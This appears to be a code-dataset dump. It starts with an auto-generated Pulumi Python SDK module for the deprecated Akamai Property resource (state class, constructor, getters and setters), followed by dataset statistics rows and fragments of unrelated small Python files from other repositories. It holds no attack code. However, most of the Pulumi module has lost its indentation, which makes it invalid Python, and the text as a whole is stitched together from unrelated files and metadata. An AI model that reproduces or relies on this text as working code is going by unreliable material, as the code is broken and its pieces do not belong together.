    @product_id.setter
    def product_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "product_id", value)

    @property
    @pulumi.getter(name="ruleFormat")
    def rule_format(self) -> Optional[pulumi.Input[str]]:
        """
        Specify the rule format version (defaults to latest version available when created)
        """
        return pulumi.get(self, "rule_format")

    @rule_format.setter
    def rule_format(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rule_format", value)

    @property
    @pulumi.getter(name="ruleWarnings")
    def rule_warnings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]:
        return pulumi.get(self, "rule_warnings")

    @rule_warnings.setter
    def rule_warnings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]):
        pulumi.set(self, "rule_warnings", value)

    @property
    @pulumi.getter
    def rules(self) -> Optional[pulumi.Input[str]]:
        """
        Property Rules as JSON
        """
        return pulumi.get(self, "rules")

    @rules.setter
    def rules(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rules", value)

    @property
    @pulumi.getter
    def variables(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "variables")

    @variables.setter
    def variables(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "variables", value)
@pulumi.input_type
class _PropertyState:
def __init__(__self__, *,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
latest_version: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
production_version: Optional[pulumi.Input[int]] = None,
read_version: Optional[pulumi.Input[int]] = None,
rule_errors: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]] = None,
rules: Optional[pulumi.Input[str]] = None,
staging_version: Optional[pulumi.Input[int]] = None,
variables: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Property resources.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[int] latest_version: Property's current latest version number
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[int] production_version: Property's version currently activated in production (zero when not active in production)
:param pulumi.Input[int] read_version: Required property's version to be read
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
:param pulumi.Input[int] staging_version: Property's version currently activated in staging (zero when not active in staging)
"""
if contacts is not None:
warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
if contacts is not None:
pulumi.set(__self__, "contacts", contacts)
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if cp_code is not None:
warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
if cp_code is not None:
pulumi.set(__self__, "cp_code", cp_code)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if hostnames is not None:
pulumi.set(__self__, "hostnames", hostnames)
if is_secure is not None:
warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
if is_secure is not None:
pulumi.set(__self__, "is_secure", is_secure)
if latest_version is not None:
pulumi.set(__self__, "latest_version", latest_version)
if name is not None:
pulumi.set(__self__, "name", name)
if origins is not None:
warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
if origins is not None:
pulumi.set(__self__, "origins", origins)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
if production_version is not None:
pulumi.set(__self__, "production_version", production_version)
if read_version is not None:
pulumi.set(__self__, "read_version", read_version)
if rule_errors is not None:
pulumi.set(__self__, "rule_errors", rule_errors)
if rule_format is not None:
pulumi.set(__self__, "rule_format", rule_format)
if rule_warnings is not None:
warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
if rule_warnings is not None:
pulumi.set(__self__, "rule_warnings", rule_warnings)
if rules is not None:
pulumi.set(__self__, "rules", rules)
if staging_version is not None:
pulumi.set(__self__, "staging_version", staging_version)
if variables is not None:
warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
if variables is not None:
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
def contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "contacts")
@contacts.setter
def contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "contacts", value)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
"""
Contract ID to be assigned to the Property
"""
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter(name="cpCode")
def cp_code(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cp_code")
@cp_code.setter
def cp_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cp_code", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
"""
Group ID to be assigned to the Property
"""
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def hostnames(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]:
return pulumi.get(self, "hostnames")
@hostnames.setter
def hostnames(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]):
pulumi.set(self, "hostnames", value)
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_secure")
@is_secure.setter
def is_secure(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_secure", value)
@property
@pulumi.getter(name="latestVersion")
def latest_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's current latest version number
"""
return pulumi.get(self, "latest_version")
@latest_version.setter
def latest_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "latest_version", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name to give to the Property (must be unique)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def origins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]:
return pulumi.get(self, "origins")
@origins.setter
def origins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]):
pulumi.set(self, "origins", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
"""
Product ID to be assigned to the Property
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="productionVersion")
def production_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's version currently activated in production (zero when not active in production)
"""
return pulumi.get(self, "production_version")
@production_version.setter
def production_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "production_version", value)
@property
@pulumi.getter(name="readVersion")
def read_version(self) -> Optional[pulumi.Input[int]]:
"""
Required property's version to be read
"""
return pulumi.get(self, "read_version")
@read_version.setter
def read_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_version", value)
@property
@pulumi.getter(name="ruleErrors")
def rule_errors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]]:
return pulumi.get(self, "rule_errors")
@rule_errors.setter
def rule_errors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]]):
pulumi.set(self, "rule_errors", value)
@property
@pulumi.getter(name="ruleFormat")
def rule_format(self) -> Optional[pulumi.Input[str]]:
"""
Specify the rule format version (defaults to latest version available when created)
"""
return pulumi.get(self, "rule_format")
@rule_format.setter
def rule_format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_format", value)
@property
@pulumi.getter(name="ruleWarnings")
def rule_warnings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]:
return pulumi.get(self, "rule_warnings")
@rule_warnings.setter
def rule_warnings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]):
pulumi.set(self, "rule_warnings", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[str]]:
"""
Property Rules as JSON
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rules", value)
@property
@pulumi.getter(name="stagingVersion")
def staging_version(self) -> Optional[pulumi.Input[int]]:
"""
Property's version currently activated in staging (zero when not active in staging)
"""
return pulumi.get(self, "staging_version")
@staging_version.setter
def staging_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "staging_version", value)
@property
@pulumi.getter
def variables(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "variables")
@variables.setter
def variables(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "variables", value)
warnings.warn("""akamai.properties.Property has been deprecated in favor of akamai.Property""", DeprecationWarning)
class Property(pulumi.CustomResource):
warnings.warn("""akamai.properties.Property has been deprecated in favor of akamai.Property""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
variables: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Property resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[PropertyArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Property resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param PropertyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PropertyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
variables: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""Property is deprecated: akamai.properties.Property has been deprecated in favor of akamai.Property""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PropertyArgs.__new__(PropertyArgs)
if contacts is not None and not opts.urn:
warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
__props__.__dict__["contacts"] = contacts
if contract is not None and not opts.urn:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
if cp_code is not None and not opts.urn:
warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
__props__.__dict__["cp_code"] = cp_code
if group is not None and not opts.urn:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["hostnames"] = hostnames
if is_secure is not None and not opts.urn:
warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["name"] = name
if origins is not None and not opts.urn:
warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
__props__.__dict__["origins"] = origins
if product is not None and not opts.urn:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
__props__.__dict__["rule_format"] = rule_format
if rule_warnings is not None and not opts.urn:
warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
__props__.__dict__["rule_warnings"] = rule_warnings
__props__.__dict__["rules"] = rules
if variables is not None and not opts.urn:
warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
__props__.__dict__["variables"] = variables
__props__.__dict__["latest_version"] = None
__props__.__dict__["production_version"] = None
__props__.__dict__["read_version"] = None
__props__.__dict__["rule_errors"] = None
__props__.__dict__["staging_version"] = None
super(Property, __self__).__init__(
'akamai:properties/property:Property',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyHostnameArgs']]]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
latest_version: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyOriginArgs']]]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
production_version: Optional[pulumi.Input[int]] = None,
read_version: Optional[pulumi.Input[int]] = None,
rule_errors: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleErrorArgs']]]]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PropertyRuleWarningArgs']]]]] = None,
rules: Optional[pulumi.Input[str]] = None,
staging_version: Optional[pulumi.Input[int]] = None,
variables: Optional[pulumi.Input[str]] = None) -> 'Property':
"""
Get an existing Property resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[int] latest_version: Property's current latest version number
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[int] production_version: Property's version currently activated in production (zero when not active in production)
:param pulumi.Input[int] read_version: Required property's version to be read
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
:param pulumi.Input[int] staging_version: Property's version currently activated in staging (zero when not active in staging)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PropertyState.__new__(_PropertyState)
__props__.__dict__["contacts"] = contacts
__props__.__dict__["contract"] = contract
__props__.__dict__["contract_id"] = contract_id
__props__.__dict__["cp_code"] = cp_code
__props__.__dict__["group"] = group
__props__.__dict__["group_id"] = group_id
__props__.__dict__["hostnames"] = hostnames
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["latest_version"] = latest_version
__props__.__dict__["name"] = name
__props__.__dict__["origins"] = origins
__props__.__dict__["product"] = product
__props__.__dict__["product_id"] = product_id
__props__.__dict__["production_version"] = production_version
__props__.__dict__["read_version"] = read_version
__props__.__dict__["rule_errors"] = rule_errors
__props__.__dict__["rule_format"] = rule_format
__props__.__dict__["rule_warnings"] = rule_warnings
__props__.__dict__["rules"] = rules
__props__.__dict__["staging_version"] = staging_version
__props__.__dict__["variables"] = variables
return Property(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def contacts(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "contacts")
@property
@pulumi.getter
def contract(self) -> pulumi.Output[str]:
return pulumi.get(self, "contract")
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> pulumi.Output[str]:
"""
Contract ID to be assigned to the Property
"""
return pulumi.get(self, "contract_id")
@property
@pulumi.getter(name="cpCode")
def cp_code(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "cp_code")
@property
@pulumi.getter
def group(self) -> pulumi.Output[str]:
return pulumi.get(self, "group")
@property
@pulumi.getter(name="groupId")
def group_id(self) -> pulumi.Output[str]:
"""
Group ID to be assigned to the Property
"""
return pulumi.get(self, "group_id")
@property
@pulumi.getter
def hostnames(self) -> pulumi.Output[Optional[Sequence['outputs.PropertyHostname']]]:
return pulumi.get(self, "hostnames")
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_secure")
@property
@pulumi.getter(name="latestVersion")
def latest_version(self) -> pulumi.Output[int]:
"""
Property's current latest version number
"""
return pulumi.get(self, "latest_version")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name to give to the Property (must be unique)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def origins(self) -> pulumi.Output[Optional[Sequence['outputs.PropertyOrigin']]]:
return pulumi.get(self, "origins")
@property
@pulumi.getter
def product(self) -> pulumi.Output[str]:
return pulumi.get(self, "product")
@property
@pulumi.getter(name="productId")
def product_id(self) -> pulumi.Output[str]:
"""
Product ID to be assigned to the Property
"""
return pulumi.get(self, "product_id")
@property
@pulumi.getter(name="productionVersion")
def production_version(self) -> pulumi.Output[int]:
"""
Property's version currently activated in production (zero when not active in production)
"""
return pulumi.get(self, "production_version")
@property
@pulumi.getter(name="readVersion")
def read_version(self) -> pulumi.Output[int]:
"""
Required property's version to be read
"""
return pulumi.get(self, "read_version")
@property
@pulumi.getter(name="ruleErrors")
def rule_errors(self) -> pulumi.Output[Sequence['outputs.PropertyRuleError']]:
return pulumi.get(self, "rule_errors")
@property
@pulumi.getter(name="ruleFormat")
def rule_format(self) -> pulumi.Output[str]:
"""
Specify the rule format version (defaults to latest version available when created)
"""
return pulumi.get(self, "rule_format")
@property
@pulumi.getter(name="ruleWarnings")
def rule_warnings(self) -> pulumi.Output[Sequence['outputs.PropertyRuleWarning']]:
return pulumi.get(self, "rule_warnings")
@property
@pulumi.getter
def rules(self) -> pulumi.Output[str]:
"""
Property Rules as JSON
"""
return pulumi.get(self, "rules")
@property
@pulumi.getter(name="stagingVersion")
def staging_version(self) -> pulumi.Output[int]:
"""
Property's version currently activated in staging (zero when not active in staging)
"""
return pulumi.get(self, "staging_version")
@property
@pulumi.getter
def variables(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "variables")
| 44.909766 | 142 | 0.638412 | 4,903 | 42,305 | 5.315113 | 0.03916 | 0.101305 | 0.11957 | 0.083576 | 0.915426 | 0.892364 | 0.868457 | 0.852072 | 0.839639 | 0.804221 | 0 | 0.000031 | 0.241437 | 42,305 | 941 | 143 | 44.957492 | 0.812035 | 0.124075 | 0 | 0.833815 | 1 | 0 | 0.171142 | 0.01394 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147399 | false | 0.001445 | 0.010116 | 0.046243 | 0.24711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c44e70e26e2aae7a184066da9cd3e62efc063db | 102 | py | Python | src/question_analysis/__init__.py | collab-uniba/qavmentor-service | f3c6f8a02bca3eeb0521ca3ac3b6e97542754c2a | [
"MIT"
] | 1 | 2018-07-23T14:42:22.000Z | 2018-07-23T14:42:22.000Z | src/question_analysis/__init__.py | collab-uniba/qavmentor-service | f3c6f8a02bca3eeb0521ca3ac3b6e97542754c2a | [
"MIT"
] | 56 | 2018-05-24T09:40:03.000Z | 2022-02-11T03:40:09.000Z | src/question_analysis/__init__.py | collab-uniba/qavmentor | 669025a40dd04cd8c9cbd264587918025ef39d20 | [
"MIT"
] | 1 | 2018-05-20T09:30:48.000Z | 2018-05-20T09:30:48.000Z | from question_analysis.feature_analysis import FeatureAnalysis
from question_analysis.post import Post | 51 | 62 | 0.911765 | 13 | 102 | 6.923077 | 0.538462 | 0.266667 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068627 | 102 | 2 | 63 | 51 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1c909d54401c8835058d67115b1de21c96da1e15 | 217 | py | Python | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | 1 | 2020-03-18T09:14:55.000Z | 2020-03-18T09:14:55.000Z | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | 1 | 2021-02-23T23:57:37.000Z | 2021-02-23T23:57:37.000Z | storage/icon_storage/actions/__init__.py | killstrelok/insightconnect-plugins | 911358925f4233ab273dbd8172e8b7b9188ebc01 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
from .check_for_variable.action import CheckForVariable
from .delete_variable.action import DeleteVariable
from .retrieve.action import Retrieve
from .store.action import Store
| 36.166667 | 55 | 0.83871 | 30 | 217 | 5.966667 | 0.6 | 0.268156 | 0.223464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115207 | 217 | 5 | 56 | 43.4 | 0.932292 | 0.170507 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
98bda94b43e28eb8cb27fcaa472aa2072fdd8233 | 101 | py | Python | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | run_all_scrapes.py | sbertazz/timeline | 05ba1da7724286290b7a536ecbfad36b4498486c | [
"MIT"
] | null | null | null | import scrapes.ita_scrape
import scrapes.uk_scrape
import scrapes.us_scrape
import scrapes.gr_scrape
| 20.2 | 25 | 0.881188 | 16 | 101 | 5.3125 | 0.4375 | 0.611765 | 0.670588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 101 | 4 | 26 | 25.25 | 0.913978 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c719228ff5f5be8d9d02c02d57965c0db2b5b3f4 | 3,952 | py | Python | lib/stolgo/candlestick.py | stockalgo/stolgo | 8f697da41f9684bc36a94cce7a1b4824334f012a | [
"MIT"
] | 125 | 2020-05-24T19:37:25.000Z | 2022-03-10T10:15:20.000Z | lib/stolgo/candlestick.py | StreamAlpha/stolgo | 5e489fd8f8cdcec1af1e466efe15176e7c961ab3 | [
"MIT"
